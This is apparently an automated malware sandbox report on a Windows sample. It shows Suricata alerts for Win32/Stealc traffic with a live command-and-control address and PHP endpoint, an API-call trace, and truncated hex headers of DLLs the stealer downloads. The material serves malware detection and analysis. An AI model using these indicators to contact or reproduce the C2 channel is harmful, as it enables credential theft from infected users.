Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C596C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C596C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 05:32:04 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 05:32:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 05:32:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 05:32:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 05:32:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 05:32:13 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 05:32:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 